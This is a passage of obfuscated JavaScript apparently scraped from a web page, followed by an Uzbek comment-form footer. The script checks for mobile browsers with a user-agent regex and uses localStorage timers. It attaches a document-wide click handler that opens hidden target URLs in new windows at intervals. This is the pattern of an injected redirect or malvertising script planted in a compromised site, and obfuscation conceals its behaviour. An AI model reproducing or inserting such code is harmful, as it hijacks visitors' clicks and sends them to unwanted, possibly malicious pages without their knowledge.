_0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan